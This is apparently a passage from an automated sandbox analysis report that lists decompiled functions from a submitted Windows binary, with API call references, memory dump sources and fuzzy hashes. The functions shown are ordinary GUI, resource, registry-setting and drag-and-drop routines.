      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Resource$FindFreeLoadLock
      • String ID:
      • API String ID: 1078018258-0
      • Opcode ID: 7751a685476da6303ff7eb93bf578fcb0ed503aacc92c8654e776d6e98c7f548
      • Instruction ID: 16c34936e4a59fe7ff8a97c9989c9dd693472f9ce45d52f4ddffa2d3900baba4
      • Opcode Fuzzy Hash: 7751a685476da6303ff7eb93bf578fcb0ed503aacc92c8654e776d6e98c7f548
      • Instruction Fuzzy Hash: A7110874100620EFD7208FA5CA88BFAB3F8FF04321F108569E95243551E770ED50E760
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AB2F2 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
      Download Yara Rule
      C-Code - Quality: 92%
      			E009AB2F2(intOrPtr __ebx, intOrPtr __edx, struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				signed int _v8;
				long _v16;
				void _v20;
				void* __edi;
				void* __esi;
				signed int _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				long _t18;
				intOrPtr _t22;
				struct HWND__* _t23;
				intOrPtr _t26;
				void* _t27;
				struct HDC__* _t28;
				signed int _t29;

				_t26 = __edx;
				_t22 = __ebx;
				_t10 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t10 ^ _t29;
				_t23 = _a8;
				_t28 = _a4;
				_t27 = _a16;
				if(_t28 == 0 || _t27 == 0) {
					L10:
					_t12 = 0;
				} else {
					_t14 = _a12;
					if(_t14 == 1 || _t14 == 0 || _t14 == 5 || _t14 == 2 && E009BBA6E(_t23, _t14) == 0) {
						goto L10;
					} else {
						GetObjectA(_t27, 0xc,  &_v20);
						SetBkColor(_t28, _v16);
						_t18 = _a20;
						if(_t18 == 0xffffffff) {
							_t18 = GetSysColor(8);
						}
						SetTextColor(_t28, _t18);
						_t12 = 1;
					}
				}
				return E00AAB46A(_t12, _t22, _v8 ^ _t29, _t26, _t27, _t28);
			}


















      0x009ab2f2
      0x009ab2f2
      0x009ab2fa
      0x009ab301
      0x009ab304
      0x009ab308
      0x009ab30c
      0x009ab311
      0x009ab36c
      0x009ab36c
      0x009ab317
      0x009ab317
      0x009ab31d
      0x00000000
      0x009ab338
      0x009ab33f
      0x009ab349
      0x009ab34f
      0x009ab355
      0x009ab359
      0x009ab359
      0x009ab361
      0x009ab369
      0x009ab369
      0x009ab31d
      0x009ab37b

      APIs
      • GetObjectA.GDI32(?,0000000C,?), ref: 009AB33F
      • SetBkColor.GDI32(?,?), ref: 009AB349
      • GetSysColor.USER32(00000008), ref: 009AB359
      • SetTextColor.GDI32(?,?), ref: 009AB361
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Color$ObjectText
      • String ID:
      • API String ID: 829078354-0
      • Opcode ID: 28b3347b70fc0684d467dc377201027e5234b64c84118f7771723bfac65cd4df
      • Instruction ID: cc176a9295b471dec5b8d36e550c692ed6e9c53eb46b8f0266e5850a4bab72b0
      • Opcode Fuzzy Hash: 28b3347b70fc0684d467dc377201027e5234b64c84118f7771723bfac65cd4df
      • Instruction Fuzzy Hash: 3B116932602204ABCF24DFA89C59AAF77ACBF4A710F550616F916D31A2CB30DD0187A0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B34BF Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON
      Download Yara Rule
      C-Code - Quality: 94%
      			E009B34BF(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					swprintf( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(_t30 + 0x6c));
				} else {
					_t30 = E009B33F8(__ecx, _t29, 0);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E00AAB46A(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}














      0x009b34bf
      0x009b34c7
      0x009b34ce
      0x009b34d2
      0x009b34d6
      0x009b34dd
      0x009b34e0
      0x009b3522
      0x009b3533
      0x009b34e2
      0x009b34ea
      0x009b34ee
      0x009b34fc
      0x009b3503
      0x009b3505
      0x009b350f
      0x009b350f
      0x009b34ee
      0x009b3547

      APIs
      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 009B34FC
      • RegCloseKey.ADVAPI32(00000000), ref: 009B3505
      • swprintf.LIBCMT ref: 009B3522
      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 009B3533
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ClosePrivateProfileStringValueWriteswprintf
      • String ID:
      • API String ID: 22681860-0
      • Opcode ID: 807c3651bf00217b17a43bd2fe52f13f9bc6a2105540db26db2bb19b293e7331
      • Instruction ID: c72daa7952ade6a8472b6396d73c3dd269c4c763af669da5a1df87e20cdf3126
      • Opcode Fuzzy Hash: 807c3651bf00217b17a43bd2fe52f13f9bc6a2105540db26db2bb19b293e7331
      • Instruction Fuzzy Hash: 0201A172501309BBDB10EF648D46FAF77ACEF48714F10441ABA02A7281DBB4EA0187A0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B586E Relevance: 6.1, APIs: 4, Instructions: 56COMMON
      Download Yara Rule
      C-Code - Quality: 91%
      			E009B586E(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				_t40 = _a8;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x68)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x68)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E009BD77F(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}















      0x009b5873
      0x009b5875
      0x009b5877
      0x009b5879
      0x009b587b
      0x009b587e
      0x009b5881
      0x009b58b6
      0x009b58b6
      0x009b58b9
      0x009b58c2
      0x009b58d4
      0x009b58d7
      0x009b58dc
      0x009b58dc
      0x009b58d7
      0x009b58e6
      0x009b58f0
      0x009b58f0
      0x009b58f6
      0x009b58f9
      0x009b58fd
      0x009b58fd
      0x009b5888
      0x009b5894
      0x009b589c
      0x00000000
      0x00000000
      0x009b58a0
      0x009b58a6
      0x009b58ab
      0x00000000
      0x00000000
      0x009b58b4
      0x00000000

      APIs
      • FindResourceA.KERNEL32(?,?,000000F0), ref: 009B5894
      • LoadResource.KERNEL32(?,00000000), ref: 009B58A0
      • LockResource.KERNEL32(00000000), ref: 009B58AE
      • FreeResource.KERNEL32(00000000), ref: 009B58DC
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Resource$FindFreeLoadLock
      • String ID:
      • API String ID: 1078018258-0
      • Opcode ID: 7eda27cc4d71da75ea4b3676a8ab3a088fc40408f9c1365270798c79cd40e26a
      • Instruction ID: f10c74756839103a2083b6e437c67ab68fa4956355894aae8ce65aa25acb04bc
      • Opcode Fuzzy Hash: 7eda27cc4d71da75ea4b3676a8ab3a088fc40408f9c1365270798c79cd40e26a
      • Instruction Fuzzy Hash: 86113675601309EFDB108FA5CA88BDA7BADEF48360F158069F8069B261DB71DD01DF60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AEE78 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009AEE78(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				struct HWND__* _t14;
				intOrPtr* _t19;
				void* _t20;
				void* _t23;

				_t23 = __edx;
				_t21 = __ecx;
				_t19 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x14c))() != 0) {
					_t21 = __ecx;
					 *((intOrPtr*)( *__ecx + 0x1ac))();
				}
				SendMessageA( *(_t19 + 0x20), 0x1f, 0, 0);
				E009AD893(_t19, _t21, _t23,  *(_t19 + 0x20), 0x1f, 0, 0, 1, 1);
				_t22 = _t19;
				_t20 = E009AE492(_t19, 0);
				if(_t20 == 0) {
					E009B8782(_t22);
				}
				SendMessageA( *(_t20 + 0x20), 0x1f, 0, 0);
				E009AD893(_t20, _t22, _t23,  *(_t20 + 0x20), 0x1f, 0, 0, 1, 1);
				_t14 = GetCapture();
				if(_t14 != 0) {
					return SendMessageA(_t14, 0x1f, 0, 0);
				}
				return _t14;
			}









      0x009aee78
      0x009aee78
      0x009aee7c
      0x009aee89
      0x009aee8d
      0x009aee8f
      0x009aee8f
      0x009aeea4
      0x009aeeb1
      0x009aeeb6
      0x009aeebd
      0x009aeec1
      0x009aeec3
      0x009aeec3
      0x009aeecf
      0x009aeedc
      0x009aeee1
      0x009aeee9
      0x00000000
      0x009aeef0
      0x009aeef5

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: MessageSend$Capture
      • String ID:
      • API String ID: 1665607226-0
      • Opcode ID: e31486946950bcdbe625d82afe472352674900913bead8db2c040788d4284acd
      • Instruction ID: d7919c6cea7c140039a10953cd9ea5f707aef22d0b5e33b892b0a890015b8774
      • Opcode Fuzzy Hash: e31486946950bcdbe625d82afe472352674900913bead8db2c040788d4284acd
      • Instruction Fuzzy Hash: 540121313502557BDA306B668CCDF9B3E7AEBCBB10F150479B6459A1A7CAA14801D6A0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B0672 Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
      Download Yara Rule
      C-Code - Quality: 94%
      			E009B0672(void* __ecx, void* __edi, signed int _a4) {
				void* __ebx;
				void* __ebp;
				void* _t16;
				int _t17;
				int _t18;
				intOrPtr _t25;
				void* _t27;
				intOrPtr _t34;
				void* _t36;

				_t36 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
						L3:
						_t17 = E009B8782(_t25);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t36 + 0x18)) = 1;
						return _t18;
					}
					if(_a4 == 0) {
						_t34 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t34 + 0x20)) {
							SendMessageA( *(E009AC90B(0, _t25, _t27, GetParent( *(_t34 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E009B0C13( *((intOrPtr*)(_t36 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}












      0x009b0679
      0x009b067b
      0x009b0682
      0x009b06b9
      0x009b0691
      0x009b0691
      0x009b0696
      0x009b069b
      0x009b06ae
      0x009b06f7
      0x009b06f7
      0x00000000
      0x009b06f7
      0x009b06be
      0x009b06c1
      0x009b06cd
      0x009b06e5
      0x009b06e5
      0x009b06eb
      0x009b06f2
      0x00000000
      0x009b06f2
      0x009b0687
      0x009b0689
      0x009b068f
      0x00000000
      0x00000000
      0x00000000
      0x009b068f
      0x009b0701

      APIs
      • EnableMenuItem.USER32 ref: 009B06AE
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      • GetFocus.USER32 ref: 009B06C4
      • GetParent.USER32(?), ref: 009B06D2
      • SendMessageA.USER32 ref: 009B06E5
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
      • String ID:
      • API String ID: 4211600527-0
      • Opcode ID: 5a4586ed9471b26cbbbf9ff21211607891b5be2c5fcc4789e72042c4ea9d9ef3
      • Instruction ID: 2fa2c92c0de7b71d607ca27041c3a5c736f970eec6b1025ee8b7b871a7b7a302
      • Opcode Fuzzy Hash: 5a4586ed9471b26cbbbf9ff21211607891b5be2c5fcc4789e72042c4ea9d9ef3
      • Instruction Fuzzy Hash: C9116171100604EFCB349F60DD89DABBBB9FFD8325B14872AF14656864C771EC55CA90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A7674 Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON
      Download Yara Rule
      C-Code - Quality: 74%
      			E009A7674(void* __ecx, intOrPtr __edx, void* __eflags, void* _a4) {
				signed int _v8;
				char _v268;
				signed int _v272;
				int _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				void* _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t37;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr _t40;
				intOrPtr _t43;
				signed int _t47;
				void* _t50;

				_t50 = __eflags;
				_t37 = __edx;
				_t32 = __ecx;
				_t45 = _t47;
				_t18 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t18 ^ _t47;
				_t30 = _a4;
				_push(_t38);
				E009AC90B(_t30, _t32, _t37, SetActiveWindow( *(__ecx + 0x20)));
				_v276 = DragQueryFileA(_t30, 0xffffffff, 0, 0);
				_t23 = E009BD77F(_t30, _t38, DragQueryFileA, _t50);
				_v272 = _v272 & 0x00000000;
				_t39 =  *((intOrPtr*)(_t23 + 4));
				if(_v276 > 0) {
					do {
						DragQueryFileA(_t30, _v272,  &_v268, 0x104);
						 *((intOrPtr*)( *_t39 + 0xa4))( &_v268);
						_v272 = _v272 + 1;
						_t23 = _v272;
					} while (_v272 < _v276);
				}
				DragFinish(_t30);
				_pop(_t40);
				_pop(_t43);
				_pop(_t31);
				return E00AAB46A(_t23, _t31, _v8 ^ _t45, _t37, _t40, _t43);
			}






















      0x009a7674
      0x009a7674
      0x009a7674
      0x009a7677
      0x009a767f
      0x009a7686
      0x009a768a
      0x009a768e
      0x009a7699
      0x009a76ad
      0x009a76b3
      0x009a76b8
      0x009a76c6
      0x009a76c9
      0x009a76cb
      0x009a76de
      0x009a76eb
      0x009a76f1
      0x009a76f7
      0x009a76fd
      0x009a76cb
      0x009a7706
      0x009a770f
      0x009a7710
      0x009a7713
      0x009a771a

      APIs
      • SetActiveWindow.USER32(?), ref: 009A7692
      • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 009A76AB
      • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 009A76DE
      • DragFinish.SHELL32(?), ref: 009A7706
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Drag$FileQuery$ActiveFinishWindow
      • String ID:
      • API String ID: 892977027-0
      • Opcode ID: ef9c9bfb8f2daba858d53b2778fa49abe473a298eb49fb20ac311c843057c832
      • Instruction ID: 24be3ab1a5253df0f903ed8cf7aa28960abd2f2d94dc60f13e28f5ff056f536a
      • Opcode Fuzzy Hash: ef9c9bfb8f2daba858d53b2778fa49abe473a298eb49fb20ac311c843057c832
      • Instruction Fuzzy Hash: B4117071900218ABCB10DB64DD85FDEB7B8FB49310F100596E65AA7191CBB49AC1CF90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AD893 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
      Download Yara Rule
      C-Code - Quality: 78%
      			E009AD893(void* __ebx, void* __ecx, void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				struct HWND__* _t26;

				_t24 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t25 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t26 = _t16;
					if(_t26 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t26, _a8, _a12, _a16);
					} else {
						_t20 = E009AC937(_t22, _t23, _t24, _t25, _t26, __eflags, _t26);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E009AD57A(_t22, _t25, _t26, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t26);
						__eflags = _t18;
						if(_t18 != 0) {
							E009AD893(_t22, _t23, _t24, _t26, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t26, 2);
				}
				return _t16;
			}














      0x009ad893
      0x009ad893
      0x009ad893
      0x009ad89d
      0x009ad8a3
      0x009ad906
      0x009ad906
      0x009ad90a
      0x00000000
      0x00000000
      0x009ad8a7
      0x009ad8ab
      0x009ad8d5
      0x009ad8ad
      0x009ad8ae
      0x009ad8b3
      0x009ad8b5
      0x009ad8b7
      0x009ad8ba
      0x009ad8bd
      0x009ad8c0
      0x009ad8c3
      0x009ad8c4
      0x009ad8c4
      0x009ad8b5
      0x009ad8db
      0x009ad8df
      0x009ad8e2
      0x009ad8e4
      0x009ad8e6
      0x009ad8f8
      0x009ad8f8
      0x009ad8e6
      0x009ad900
      0x009ad900
      0x009ad90f

      APIs
      • GetTopWindow.USER32(?), ref: 009AD8A3
      • GetTopWindow.USER32(00000000), ref: 009AD8E2
      • GetWindow.USER32(00000000,00000002), ref: 009AD900
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window
      • String ID:
      • API String ID: 2353593579-0
      • Opcode ID: 33a90e57cf65921586eb04c645952f756686851c23969b9ed24cb877fd1391d2
      • Instruction ID: 912442cb727e5745f965dea2f852c8a5581f6e8921b7f55b316c455b505dfa12
      • Opcode Fuzzy Hash: 33a90e57cf65921586eb04c645952f756686851c23969b9ed24cb877fd1391d2
      • Instruction Fuzzy Hash: E3010C3200261ABBCF126F95DC08EDF3B2AEF8A350F054425FA1665460C73AC931EBE1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AD018 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
      Download Yara Rule
      C-Code - Quality: 91%
      			E009AD018(void* __ebx, void* __ecx, void* __edx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t15 = __edx;
				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t16 = GetTopWindow;
				_t17 = _t9;
				if(_t17 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t18 = _t10;
						__eflags = _t18;
						if(_t18 == 0) {
							goto L10;
						}
						_t10 = E009AD018(_t13, _t14, _t15, _t18, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t18, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t17) == 0) {
						L3:
						_push(_t17);
						if(_a12 == 0) {
							return E009AC90B(_t13, _t14, _t15);
						}
						_t10 = E009AC937(_t13, _t14, _t15, _t16, _t17, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E009AD018(__ebx, _t14, _t15, _t17, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}












      0x009ad018
      0x009ad018
      0x009ad018
      0x009ad025
